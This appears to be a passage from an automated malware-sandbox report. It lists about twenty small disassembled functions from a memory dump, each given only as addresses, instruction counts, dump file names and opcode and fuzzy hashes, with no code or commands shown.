                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                        • Instruction ID: 28a5de5ba744d4e535ff54077583e68c6f22d897c7c42a7f508ba4d49ddf254e
                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                        • Instruction Fuzzy Hash: 9EF0E23D742E3287DB39EA2F8420B3EF696AF88A02B49453C9541CF780DFA0D8148780
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318C912 Relevance: .0, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 989c8f777f6401a2ed43d4bb4bb81db66fd69ecd75e5ff2eb364a8cb956e06e1
                                                                        • Instruction ID: 40167a0078e5c4ccc1bd31098e3a59316599382d33d2314c798238830c0c9ea9
                                                                        • Opcode Fuzzy Hash: 989c8f777f6401a2ed43d4bb4bb81db66fd69ecd75e5ff2eb364a8cb956e06e1
                                                                        • Instruction Fuzzy Hash: 6DF06274A01349DFCB04EFA9C515A9EB7B4EF1C300F108065B855EB385DB74EA01CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031047FB Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00eebf5b9d58daa483d639afef4ed96f670f64928163b51cdd5da5c8eb389832
                                                                        • Instruction ID: c561ae9996e942523fd56c9903b3ab2703a1b157cf010130fbe920a6f4605743
                                                                        • Opcode Fuzzy Hash: 00eebf5b9d58daa483d639afef4ed96f670f64928163b51cdd5da5c8eb389832
                                                                        • Instruction Fuzzy Hash: 79F090719127D09FD731DB9AC0C4B61B7D89B09621F0D8DABD649875A1CFE4D880CE50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031C0115 Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d0295096e17932eace54b97e36b3bb4308ea6381e03196d8634b43ffe4e5f310
                                                                        • Instruction ID: 0f3cfc2e9802250ae450ff8d9e1634b6a7f683004814225248a55df841de143c
                                                                        • Opcode Fuzzy Hash: d0295096e17932eace54b97e36b3bb4308ea6381e03196d8634b43ffe4e5f310
                                                                        • Instruction Fuzzy Hash: 44F0826A4267C48FCF25EA2869502D5EB69E75D110F1D148DC4A16B205C775C9C3C664
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142619 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                        • Instruction ID: 6bfd63303fb12488146838ac32b8be81723241426973ecb09c0ccfa78237a8ca
                                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                        • Instruction Fuzzy Hash: 95E09232301A006BD721DE59CC80F47B76E9FCAB10F040479B9045F251CBE29C5986A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313C5ED Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 31ddce2429a75077a693734961688eff593b64d1e0cf02ac0f5b8e80697081a7
                                                                        • Instruction ID: 27be4671cd33512e22c565d14666af9d3ae7af7c96648cbffcdf27d74292e8c6
                                                                        • Opcode Fuzzy Hash: 31ddce2429a75077a693734961688eff593b64d1e0cf02ac0f5b8e80697081a7
                                                                        • Instruction Fuzzy Hash: 0BF0E2F55916909FC332D718C548B51F3D89B4F7A0F0D9475D40697722CB64C880CAD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03196030 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                        • Instruction ID: 52e01cffdbc8f93446a147e80d7fe7e106ee604db3862c68ec6cf0989d85cf53
                                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                        • Instruction Fuzzy Hash: 19F01C721046049FF724CF05D984B52B7A9EB49764F5A8066E6099B560D379EC80CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03100710 Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                        • Instruction ID: b7f1fe598696a1ed586682cd559712f7bf0dd3bed318c3e606c3b575247d253d
                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                        • Instruction Fuzzy Hash: E6F0ED3E604740DBDB1ACF16C040AE57BA8EB4D360B054494FCA28B380EB75EA82CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D4164 Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2cfeb0469237dbdba3a95152ad42aea127525978990906a68f20843ff503669f
                                                                        • Instruction ID: b8f9146a9bfed0664d68063b92b427aec5df7152a85e8d3699622c29afcd55fe
                                                                        • Opcode Fuzzy Hash: 2cfeb0469237dbdba3a95152ad42aea127525978990906a68f20843ff503669f
                                                                        • Instruction Fuzzy Hash: E3F02B399266904FD771D727E140F56B3E4AF0A630F0E05A4D4118B911CF34FC40C650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031A678E Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction ID: 41028574caaa289681eb119a24c03b700360d5231ce17a48a1895dd3d626cc08
                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction Fuzzy Hash: CCE0D836A00620BBDB21D7998D01FAABAACDB98E91F090054B500DB0D4D630DE00C6D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031025E0 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d229cb81919af78028d41c6eb4bc4acb3ebaa3d35a5b74393717f3235291e82f
                                                                        • Instruction ID: c79c5d22808ffdc775705fc5c274ecffd45e1887fa95e67d48e27986b60494c1
                                                                        • Opcode Fuzzy Hash: d229cb81919af78028d41c6eb4bc4acb3ebaa3d35a5b74393717f3235291e82f
                                                                        • Instruction Fuzzy Hash: 43E09236100A549BC321FB29DD01F8A779AEB58360F014925B1555B190CB70A851C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031BA456 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                        • Instruction ID: d2b303f7f4a9cc3d14e0266cdef579b2c6013671de23a7fe5b67c9ef88be4621
                                                                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                        • Instruction Fuzzy Hash: 73E01A39010B50DFD736EF2AD948B96BAF1AF48711F1D8C2DE09A194B0C7B598D1CA80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03184000 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                        • Instruction ID: 3a22bebeee84eb3a2a470ccdc70917a3a60d047b5fead5a559ae6629a078c148
                                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                        • Instruction Fuzzy Hash: 1CE0AE343003068BD715DF1AC040BA3B7A6BFD9B10F28C068A8488F205EB32A8428A44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030F823B Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                        • Instruction ID: 3234147eede3713985fbfb88c309b32cc201001f9efd20b1ce833bbe2c700643
                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                        • Instruction Fuzzy Hash: E7E08C35106A10EFDB71EF11DC00B9576A5FB48B50F248C6AF1860A8A48770A8C2CA44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03102050 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f4eb73b340ba9feaf1d2590bf4dc5321bfb57d1d6b22a48ad0489903fa5fdd8
                                                                        • Instruction ID: b14a6765334162a69e25f8b9f230cd93cd45cab72403f0689489fa3f900b673b
                                                                        • Opcode Fuzzy Hash: 7f4eb73b340ba9feaf1d2590bf4dc5321bfb57d1d6b22a48ad0489903fa5fdd8
                                                                        • Instruction Fuzzy Hash: C3E08C322006506BC211FA5DDD40F8A739AEB99260F000122B1508B2D4CB60AC41C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03138A90 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction ID: 487678aea209487b70082bef77f9727e02b14c04fc441830def0bc690d0c4d4d
                                                                        • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction Fuzzy Hash: DEE08633111A1487C729DF18D511B72B7A4EF49720F09463EA51387780C634E548C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03156AA4 Relevance: .0, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                        • Instruction ID: 40d1b279a5448fa6f3f5fd88d386bf01a288d7f48fceac26d7063916bf309ef9
                                                                        • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                        • Instruction Fuzzy Hash: 1CD01236511A509BC3319F16D900953B6F5FBC8A10705052EA45542914C770A806CA90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313E59C Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction ID: 1d34110a31632a56ae324c9cc42c4f82bf4cc03d0e35c22b55b9af675cb57cef
                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction Fuzzy Hash: C4D0C7326546505BD771EA1CFC04FD373E9AB4C761F190459B015C7154D765AC41C644
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0317E908 Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction ID: da4ee0334f5d34dca33680752b03e6f222798b35502bf4c3c850f2e532b2501e
                                                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction Fuzzy Hash: EEE0EC3AA507849BCF12DF59C640F9AB7F9BB88B40F190458A0485F660C724A901CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FA0E3 Relevance: .0, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction ID: 3f5a8ffbea8b2c6e4c239fae44052ea0f4daabcd59bfb66ac2f2f98561df9c9c
                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction Fuzzy Hash: BDD022323130309BCB28E6546800FA7B905EF80A90F0A002D350E93C00C1048C83CAE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313CA24 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: afc36ab9cffc31f343511308d8d113d9899223890d63f489bcbc367b4104c898
                                                                        • Instruction ID: 222ee01879d7cf393ab72e11e7d17103528f696f4bf784c5120df853a77ad760
                                                                        • Opcode Fuzzy Hash: afc36ab9cffc31f343511308d8d113d9899223890d63f489bcbc367b4104c898
                                                                        • Instruction Fuzzy Hash: D0D0A938B01101CFCF1BEF04CA15FAEB2B4EB0C740B4800B8E702A2020F3A8DC02CA90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031102A0 Relevance: .0, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction ID: 68437ea7ac071486986e0d7bb224ab7013435147913a72a97941fded1b2a8a0c
                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction Fuzzy Hash: 2ED0C935612E80CFC71ACB4DC5A4B55B3A8BB4CB44F8544E0E401CBB21D72CE9D0CA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

